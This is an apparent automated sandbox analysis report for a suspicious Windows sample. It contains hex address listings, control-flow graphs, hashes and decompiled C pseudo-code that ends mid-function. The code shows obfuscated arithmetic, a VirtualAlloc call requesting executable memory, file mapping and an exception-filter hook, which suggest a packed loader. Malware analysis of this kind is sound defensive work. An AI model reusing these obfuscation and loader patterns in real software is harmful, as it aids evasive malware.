                                                                                                                                                                                                                                                                            0x00372014
                                                                                                                                                                                                                                                                            0x00372019
                                                                                                                                                                                                                                                                            0x0037201f
                                                                                                                                                                                                                                                                            0x00372023
                                                                                                                                                                                                                                                                            0x00372027
                                                                                                                                                                                                                                                                            0x0037202b
                                                                                                                                                                                                                                                                            0x0037202f
                                                                                                                                                                                                                                                                            0x00372033
                                                                                                                                                                                                                                                                            0x00372034
                                                                                                                                                                                                                                                                            0x00372039
                                                                                                                                                                                                                                                                            0x0037203c
                                                                                                                                                                                                                                                                            0x00372048
                                                                                                                                                                                                                                                                            0x0037204e
                                                                                                                                                                                                                                                                            0x0037204e
                                                                                                                                                                                                                                                                            0x00371f36
                                                                                                                                                                                                                                                                            0x00372192
                                                                                                                                                                                                                                                                            0x003723a4
                                                                                                                                                                                                                                                                            0x003723c9
                                                                                                                                                                                                                                                                            0x003723d5
                                                                                                                                                                                                                                                                            0x003723f0
                                                                                                                                                                                                                                                                            0x003723f9
                                                                                                                                                                                                                                                                            0x00372404
                                                                                                                                                                                                                                                                            0x00372418
                                                                                                                                                                                                                                                                            0x00372426
                                                                                                                                                                                                                                                                            0x0037243e
                                                                                                                                                                                                                                                                            0x00372444
                                                                                                                                                                                                                                                                            0x0037244a
                                                                                                                                                                                                                                                                            0x00372474
                                                                                                                                                                                                                                                                            0x00372497
                                                                                                                                                                                                                                                                            0x003724b3
                                                                                                                                                                                                                                                                            0x003724c8
                                                                                                                                                                                                                                                                            0x003724e8
                                                                                                                                                                                                                                                                            0x003724ee
                                                                                                                                                                                                                                                                            0x003724f3
                                                                                                                                                                                                                                                                            0x003724ff
                                                                                                                                                                                                                                                                            0x0037250d
                                                                                                                                                                                                                                                                            0x0037251a
                                                                                                                                                                                                                                                                            0x00372526
                                                                                                                                                                                                                                                                            0x00372538
                                                                                                                                                                                                                                                                            0x00372557
                                                                                                                                                                                                                                                                            0x00372565
                                                                                                                                                                                                                                                                            0x00372587
                                                                                                                                                                                                                                                                            0x0037259d
                                                                                                                                                                                                                                                                            0x003725bc
                                                                                                                                                                                                                                                                            0x003725f5
                                                                                                                                                                                                                                                                            0x00372609
                                                                                                                                                                                                                                                                            0x00372198
                                                                                                                                                                                                                                                                            0x003721a0
                                                                                                                                                                                                                                                                            0x003721a6
                                                                                                                                                                                                                                                                            0x003721af
                                                                                                                                                                                                                                                                            0x003721ba
                                                                                                                                                                                                                                                                            0x003721c3
                                                                                                                                                                                                                                                                            0x003721cc
                                                                                                                                                                                                                                                                            0x003721d7
                                                                                                                                                                                                                                                                            0x003721e0
                                                                                                                                                                                                                                                                            0x003721e6
                                                                                                                                                                                                                                                                            0x003721ea
                                                                                                                                                                                                                                                                            0x003721ee
                                                                                                                                                                                                                                                                            0x003721f2
                                                                                                                                                                                                                                                                            0x003721f6
                                                                                                                                                                                                                                                                            0x003721fa
                                                                                                                                                                                                                                                                            0x003721fe
                                                                                                                                                                                                                                                                            0x00372207
                                                                                                                                                                                                                                                                            0x00372210
                                                                                                                                                                                                                                                                            0x00372216
                                                                                                                                                                                                                                                                            0x00372229
                                                                                                                                                                                                                                                                            0x00372234
                                                                                                                                                                                                                                                                            0x00372240
                                                                                                                                                                                                                                                                            0x00372249
                                                                                                                                                                                                                                                                            0x00372254
                                                                                                                                                                                                                                                                            0x00372260
                                                                                                                                                                                                                                                                            0x0037226c
                                                                                                                                                                                                                                                                            0x00372277
                                                                                                                                                                                                                                                                            0x00372280
                                                                                                                                                                                                                                                                            0x00372286
                                                                                                                                                                                                                                                                            0x003722ad
                                                                                                                                                                                                                                                                            0x003722b9
                                                                                                                                                                                                                                                                            0x003722c5
                                                                                                                                                                                                                                                                            0x003722d0
                                                                                                                                                                                                                                                                            0x003722e1
                                                                                                                                                                                                                                                                            0x0037230a
                                                                                                                                                                                                                                                                            0x00372310
                                                                                                                                                                                                                                                                            0x00372325
                                                                                                                                                                                                                                                                            0x00372340
                                                                                                                                                                                                                                                                            0x003722e3
                                                                                                                                                                                                                                                                            0x003722e6
                                                                                                                                                                                                                                                                            0x003722ec
                                                                                                                                                                                                                                                                            0x003722f2
                                                                                                                                                                                                                                                                            0x003722f2
                                                                                                                                                                                                                                                                            0x0037234e
                                                                                                                                                                                                                                                                            0x0037236a
                                                                                                                                                                                                                                                                            0x0037237a
                                                                                                                                                                                                                                                                            0x0037237f
                                                                                                                                                                                                                                                                            0x0037237f
                                                                                                                                                                                                                                                                            0x00372385
                                                                                                                                                                                                                                                                            0x00372616

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateExitMutexProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3437166654-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3eacd8522defb30f9d4a3ed2e669e868e8fb4a18b2c0b572794a53a5fa692cc1
                                                                                                                                                                                                                                                                            • Instruction ID: 71dd783ba7f2e652eb4929dbbc1f4d5d2e6254b2bf68b71620c26b59d006641f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eacd8522defb30f9d4a3ed2e669e868e8fb4a18b2c0b572794a53a5fa692cc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E142B6B5A002498FDB08CF98D994A9EBBF6FF88304F548229F9199B355D734E845CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 253 374040-3740b0 254 3740b6-3740c1 253->254 255 3743eb-37440e 253->255 256 3740c7-3740d0 254->256 257 37437a-3743a2 254->257 258 374414-374499 CreateFileMappingA 255->258 259 37449f-3744ae 255->259 262 3740db-3740e4 256->262 260 3743e6 257->260 261 3743a4-3743b3 257->261 258->259 260->259 263 3743be-3743c7 261->263 264 3741c3-374364 call 373660 call 3885e0 call 374a40 call 371280 262->264 265 3740ea-3741be 262->265 263->260 266 3743c9-3743e4 263->266 276 374369-374378 264->276 265->262 266->263 276->260
                                                                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                                                                            			E00374040() {
                                                                                                                                                                                                                                                                            				signed int _t227;
                                                                                                                                                                                                                                                                            				signed int _t249;
                                                                                                                                                                                                                                                                            				signed int _t280;
                                                                                                                                                                                                                                                                            				intOrPtr _t286;
                                                                                                                                                                                                                                                                            				signed int _t289;
                                                                                                                                                                                                                                                                            				signed int* _t402;
                                                                                                                                                                                                                                                                            				void* _t404;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t402 = _t404 - 0x60;
                                                                                                                                                                                                                                                                            				_t402[0x15] = _t402[0x1d] - 0x2628;
                                                                                                                                                                                                                                                                            				_t402[0x13] = _t402[0x1a] + 0x181;
                                                                                                                                                                                                                                                                            				_t402[0x16] = _t402[0x1a] ^ 0x00002506;
                                                                                                                                                                                                                                                                            				_t402[0xf] = _t402[0x1b] + 0x65;
                                                                                                                                                                                                                                                                            				_t402[0x10] = _t402[0x1c] ^ 0x000000f3;
                                                                                                                                                                                                                                                                            				_t402[0xe] = _t402[0x1c] ^ 0x0000005c;
                                                                                                                                                                                                                                                                            				_t402[0x14] = _t402[0x1b] - 0x15b;
                                                                                                                                                                                                                                                                            				_t402[0x17] = _t402[0x1c] - 0x2674;
                                                                                                                                                                                                                                                                            				if(_t402[0x15] == _t402[0x17] + 0x2628) {
                                                                                                                                                                                                                                                                            					if( *0x00FBB039 >= (_t402[0x16] | _t402[0x16] |  *(_t402[0x1f] + 0x44))) {
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x44) = _t402[0x15] + 0x2506;
                                                                                                                                                                                                                                                                            						_t280 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t172 = _t280 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x40) = (_t402[0x15] &  *(_t402[0x1f] + 0xf0)) -  *_t172;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x3c) = _t402[0x17] & _t402[0x17];
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x38) = (_t402[0x13] & _t402[0x14]) * 0x2687;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x34) = (_t402[0x13] | 0x000027b9) ^ 0x000025a0;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x30) =  *0x00FBAF8D &  *(_t402[0x1f] + 0x30);
                                                                                                                                                                                                                                                                            						CreateFileMappingA( *(_t402 - 0x44),  *(_t402 - 0x40),  *(_t402 - 0x3c),  *(_t402 - 0x38),  *(_t402 - 0x34),  *(_t402 - 0x30));
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					if(_t402[0xe] > _t402[0x14] + 0x2cf) {
                                                                                                                                                                                                                                                                            						_t286 =  *0x40d470; // 0x38f7708d
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t402[0x1f] + 0x38)) != (_t286 +  *0x00FBAF8D & 0x000024c7)) {
                                                                                                                                                                                                                                                                            							_t289 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t150 = _t289 + 0xf4; // 0x0
                                                                                                                                                                                                                                                                            							_t402[0x11] =  *_t150;
                                                                                                                                                                                                                                                                            							while(_t402[0x11] != (_t402[0x17] | _t402[0x17])) {
                                                                                                                                                                                                                                                                            								_t402[0x16] =  *0x0040D460 *  *0x40d440 ^ _t402[0x16];
                                                                                                                                                                                                                                                                            								_t402[0x11] = _t402[0x11] + 2;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t402[0x12] =  *(_t402[0x1f] + 0x60);
                                                                                                                                                                                                                                                                            						while(_t402[0x12] <=  *((intOrPtr*)(_t402[0x1f] + 0x68))) {
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t402[0x1f] + 0x6c)) =  *((intOrPtr*)(_t402[0x1f] + 0x6c)) -  *((intOrPtr*)(_t402[0x1f] + 0xe4)) - 0x62;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t402[0x1f] + 0xdc)) = _t402[0x12] * _t402[0x12] +  *((intOrPtr*)(_t402[0x1f] + 0xdc));
                                                                                                                                                                                                                                                                            							 *(_t402[0x1f] + 0x10c) =  *((intOrPtr*)(_t402[0x1f] + 0x8c)) -  *((intOrPtr*)(_t402[0x1f] + 0xd0)) + 0x00033baa ^  *(_t402[0x1f] + 0x10c);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t402[0x1f] + 0xac)) =  *((intOrPtr*)(_t402[0x1f] + 0xb4)) -  *0x0040D3BC +  *((intOrPtr*)(_t402[0x1f] + 0xac)) - 0x367796e1;
                                                                                                                                                                                                                                                                            							_t402[0x12] = _t402[0x12] + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t402[7] = _t402[0x17] + 0x2598;
                                                                                                                                                                                                                                                                            						_t402[8] = _t402[0x14] ^ 0x000002ef;
                                                                                                                                                                                                                                                                            						_t402[9] = _t402[0x17] ^ 0x000025a0;
                                                                                                                                                                                                                                                                            						_t402[0xa] = _t402[0x16] ^ 0x00002801;
                                                                                                                                                                                                                                                                            						_t402[0xb] = _t402[0x17] + 0x2565;
                                                                                                                                                                                                                                                                            						_t402[0xc] = _t402[0x15] + 0x2622;
                                                                                                                                                                                                                                                                            						_t227 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t402[0xd] = _t227;
                                                                                                                                                                                                                                                                            						_t402[0x17] = E00373660(_t402[7], _t402[8], _t402[9], _t402[0xa], _t402[0xb], _t402[0xc], _t402[0xd]);
                                                                                                                                                                                                                                                                            						 *0x40d448 =  *((intOrPtr*)(_t402[0x1f] + 0xdc));
                                                                                                                                                                                                                                                                            						_t402[2] = _t402[0x13] + 0x17a;
                                                                                                                                                                                                                                                                            						_t402[3] = _t402[0x15] + 0x2622;
                                                                                                                                                                                                                                                                            						_t402[4] = _t402[0xf] + 0x17a;
                                                                                                                                                                                                                                                                            						_t402[5] = _t402[0x1f];
                                                                                                                                                                                                                                                                            						_t402[6] = _t402[0x17] ^ 0x000000fc;
                                                                                                                                                                                                                                                                            						_t402[0x14] = E003885E0(_t402[2], _t402[3], _t402[4], _t402[5], _t402[6]);
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x10) = _t402[0x13] ^ 0x00000111;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0xc) = _t402[0x1f];
                                                                                                                                                                                                                                                                            						 *(_t402 - 8) = _t402[0x10] ^ 0x000003bc;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 4)) = _t402[0x14] + 0x6b;
                                                                                                                                                                                                                                                                            						 *_t402 = _t402[0x15] ^ 0x00002565;
                                                                                                                                                                                                                                                                            						_t402[1] = _t402[0x16] ^ 0x00002506;
                                                                                                                                                                                                                                                                            						_push(_t402[1]);
                                                                                                                                                                                                                                                                            						_t402[0x16] = E00374A40( *(_t402 - 0x10),  *(_t402 - 0xc),  *(_t402 - 8),  *((intOrPtr*)(_t402 - 4)),  *_t402);
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x2c)) = _t402[0x14] + 0xa4;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x28) = _t402[0x16] ^ 0x00000308;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x24)) = _t402[0x14] - 0x25b;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x20)) = _t402[0x17] - 0x134;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x1c) = _t402[0x10] ^ 0x000000a5;
                                                                                                                                                                                                                                                                            						 *(_t402 - 0x18) = _t402[0x15] ^ 0x000025a0;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t402 - 0x14)) = 0x40d3a8;
                                                                                                                                                                                                                                                                            						_t249 = E00371280( *((intOrPtr*)(_t402 - 0x2c)),  *(_t402 - 0x28),  *((intOrPtr*)(_t402 - 0x24)),  *((intOrPtr*)(_t402 - 0x20)),  *(_t402 - 0x1c),  *(_t402 - 0x18),  *((intOrPtr*)(_t402 - 0x14))); // executed
                                                                                                                                                                                                                                                                            						_t402[0x16] = _t249;
                                                                                                                                                                                                                                                                            						_t402[0x13] = _t402[0x13] ^ 0x00000062;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t402[0xf] - 0x1c0;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x00374041
                                                                                                                                                                                                                                                                            0x00374054
                                                                                                                                                                                                                                                                            0x00374060
                                                                                                                                                                                                                                                                            0x0037406c
                                                                                                                                                                                                                                                                            0x00374075
                                                                                                                                                                                                                                                                            0x00374081
                                                                                                                                                                                                                                                                            0x0037408a
                                                                                                                                                                                                                                                                            0x00374095
                                                                                                                                                                                                                                                                            0x003740a1
                                                                                                                                                                                                                                                                            0x003740b0
                                                                                                                                                                                                                                                                            0x0037440e
                                                                                                                                                                                                                                                                            0x0037441d
                                                                                                                                                                                                                                                                            0x00374435
                                                                                                                                                                                                                                                                            0x0037443b
                                                                                                                                                                                                                                                                            0x0037443e
                                                                                                                                                                                                                                                                            0x00374447
                                                                                                                                                                                                                                                                            0x00374456
                                                                                                                                                                                                                                                                            0x00374468
                                                                                                                                                                                                                                                                            0x0037447e
                                                                                                                                                                                                                                                                            0x00374499
                                                                                                                                                                                                                                                                            0x00374499
                                                                                                                                                                                                                                                                            0x003740b6
                                                                                                                                                                                                                                                                            0x003740c1
                                                                                                                                                                                                                                                                            0x00374389
                                                                                                                                                                                                                                                                            0x003743a2
                                                                                                                                                                                                                                                                            0x003743a4
                                                                                                                                                                                                                                                                            0x003743aa
                                                                                                                                                                                                                                                                            0x003743b0
                                                                                                                                                                                                                                                                            0x003743be
                                                                                                                                                                                                                                                                            0x003743e1
                                                                                                                                                                                                                                                                            0x003743bb
                                                                                                                                                                                                                                                                            0x003743bb
                                                                                                                                                                                                                                                                            0x003743be
                                                                                                                                                                                                                                                                            0x003740c7
                                                                                                                                                                                                                                                                            0x003740cd
                                                                                                                                                                                                                                                                            0x003740db
                                                                                                                                                                                                                                                                            0x0037411b
                                                                                                                                                                                                                                                                            0x00374132
                                                                                                                                                                                                                                                                            0x00374175
                                                                                                                                                                                                                                                                            0x003741b7
                                                                                                                                                                                                                                                                            0x003740d8
                                                                                                                                                                                                                                                                            0x003740d8
                                                                                                                                                                                                                                                                            0x003741cb
                                                                                                                                                                                                                                                                            0x003741d7
                                                                                                                                                                                                                                                                            0x003741e3
                                                                                                                                                                                                                                                                            0x003741ee
                                                                                                                                                                                                                                                                            0x003741fa
                                                                                                                                                                                                                                                                            0x00374206
                                                                                                                                                                                                                                                                            0x00374209
                                                                                                                                                                                                                                                                            0x0037420e
                                                                                                                                                                                                                                                                            0x00374235
                                                                                                                                                                                                                                                                            0x00374241
                                                                                                                                                                                                                                                                            0x0037424f
                                                                                                                                                                                                                                                                            0x0037425b
                                                                                                                                                                                                                                                                            0x00374266
                                                                                                                                                                                                                                                                            0x0037426c
                                                                                                                                                                                                                                                                            0x00374278
                                                                                                                                                                                                                                                                            0x00374297
                                                                                                                                                                                                                                                                            0x003742a3
                                                                                                                                                                                                                                                                            0x003742a9
                                                                                                                                                                                                                                                                            0x003742b5
                                                                                                                                                                                                                                                                            0x003742be
                                                                                                                                                                                                                                                                            0x003742c9
                                                                                                                                                                                                                                                                            0x003742d5
                                                                                                                                                                                                                                                                            0x003742db
                                                                                                                                                                                                                                                                            0x003742f8
                                                                                                                                                                                                                                                                            0x00374304
                                                                                                                                                                                                                                                                            0x0037430f
                                                                                                                                                                                                                                                                            0x0037431b
                                                                                                                                                                                                                                                                            0x00374327
                                                                                                                                                                                                                                                                            0x00374332
                                                                                                                                                                                                                                                                            0x0037433e
                                                                                                                                                                                                                                                                            0x00374341
                                                                                                                                                                                                                                                                            0x00374364
                                                                                                                                                                                                                                                                            0x0037436c
                                                                                                                                                                                                                                                                            0x00374375
                                                                                                                                                                                                                                                                            0x00374375
                                                                                                                                                                                                                                                                            0x003743e6
                                                                                                                                                                                                                                                                            0x003744ae

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00374499
                                                                                                                                                                                                                                                                              • Part of subcall function 00371280: VirtualAlloc.KERNEL32(00000000,?,?,00000040), ref: 00371352
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocCreateFileMappingVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 141659071-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4ba77a7e6bdb4ef64b1bca709ac19b8bee070d2917df4928c9c2bc1bc85760cd
                                                                                                                                                                                                                                                                            • Instruction ID: 22fb803e60a1b3429071b57876c13d83551385d1d9efe9292e6166b444ec834d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ba77a7e6bdb4ef64b1bca709ac19b8bee070d2917df4928c9c2bc1bc85760cd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E1B771A00149DFDB18CF98C994A9EBBF6FF88304F548229F9299B395D734E841CB94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 321 37e101-37e10c SetUnhandledExceptionFilter
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037E101() {
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t1 = SetUnhandledExceptionFilter(E0037E10D); // executed
                                                                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x0037e106
                                                                                                                                                                                                                                                                            0x0037e10c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000E10D,0037DCBF), ref: 0037E106
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                            • Opcode ID: 049f47ab598887e832afdf88aedca6863880778e453938f6b85b18c01e0bb9c5
                                                                                                                                                                                                                                                                            • Instruction ID: 072fe79817490ddcf2f0d9426680eb8fcc999e09f21bb623f933f06e98b1c0a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 049f47ab598887e832afdf88aedca6863880778e453938f6b85b18c01e0bb9c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 0 37ca49-37ca62 1 37ca64-37ca74 call 37d97d 0->1 2 37ca78-37ca7d 0->2 1->2 9 37ca76 1->9 4 37ca7f-37ca87 2->4 5 37ca8a-37caae MultiByteToWideChar 2->5 4->5 7 37cab4-37cac0 5->7 8 37cc41-37cc54 call 37de3e 5->8 10 37cb14 7->10 11 37cac2-37cad3 7->11 9->2 13 37cb16-37cb18 10->13 14 37cad5-37cae4 call 37e490 11->14 15 37caf2-37cb03 call 37bf3c 11->15 17 37cc36 13->17 18 37cb1e-37cb31 MultiByteToWideChar 13->18 14->17 28 37caea-37caf0 14->28 15->17 25 37cb09 15->25 23 37cc38-37cc3f call 37a83b 17->23 18->17 22 37cb37-37cb49 call 37ac09 18->22 30 37cb4e-37cb52 22->30 23->8 29 37cb0f-37cb12 25->29 28->29 29->13 30->17 32 37cb58-37cb5f 30->32 33 37cb61-37cb66 32->33 34 37cb99-37cba5 32->34 33->23 37 37cb6c-37cb6e 33->37 35 37cba7-37cbb8 34->35 36 37cbf1 34->36 38 37cbd3-37cbe4 call 37bf3c 35->38 39 37cbba-37cbc9 call 37e490 35->39 40 37cbf3-37cbf5 36->40 37->17 41 37cb74-37cb8e call 37ac09 37->41 45 37cc2f-37cc35 call 37a83b 38->45 54 37cbe6 38->54 39->45 52 37cbcb-37cbd1 39->52 44 37cbf7-37cc10 call 37ac09 40->44 40->45 41->23 56 37cb94 41->56 44->45 57 37cc12-37cc19 44->57 45->17 58 37cbec-37cbef 52->58 54->58 56->17 59 37cc55-37cc5b 57->59 60 37cc1b-37cc1c 57->60 58->40 61 37cc1d-37cc2d WideCharToMultiByte 59->61 60->61 61->45 62 37cc5d-37cc64 call 37a83b 61->62 62->23
                                                                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                                                                            			E0037CA49(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                                            				int _t58;
                                                                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                                                                            				short* _t62;
                                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                                            				short* _t70;
                                                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                                                            				int _t78;
                                                                                                                                                                                                                                                                            				short* _t81;
                                                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				int _t98;
                                                                                                                                                                                                                                                                            				short* _t101;
                                                                                                                                                                                                                                                                            				int _t103;
                                                                                                                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                                                                                                                            				short* _t107;
                                                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_t49 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            				_v8 = _t49 ^ _t106;
                                                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                                                            				_t103 = _a20;
                                                                                                                                                                                                                                                                            				if(_t103 > 0) {
                                                                                                                                                                                                                                                                            					_t78 = E0037D97D(_a16, _t103);
                                                                                                                                                                                                                                                                            					_t110 = _t78 - _t103;
                                                                                                                                                                                                                                                                            					_t4 = _t78 + 1; // 0x1
                                                                                                                                                                                                                                                                            					_t103 = _t4;
                                                                                                                                                                                                                                                                            					if(_t110 >= 0) {
                                                                                                                                                                                                                                                                            						_t103 = _t78;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t98 = _a32;
                                                                                                                                                                                                                                                                            				if(_t98 == 0) {
                                                                                                                                                                                                                                                                            					_t98 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                                            					_a32 = _t98;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                                                                                                                                                            				_v12 = _t54;
                                                                                                                                                                                                                                                                            				if(_t54 == 0) {
                                                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                                                            					return E0037DE3E(_v8 ^ _t106);
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t95 = _t54 + _t54;
                                                                                                                                                                                                                                                                            					_t85 = _t95 + 8;
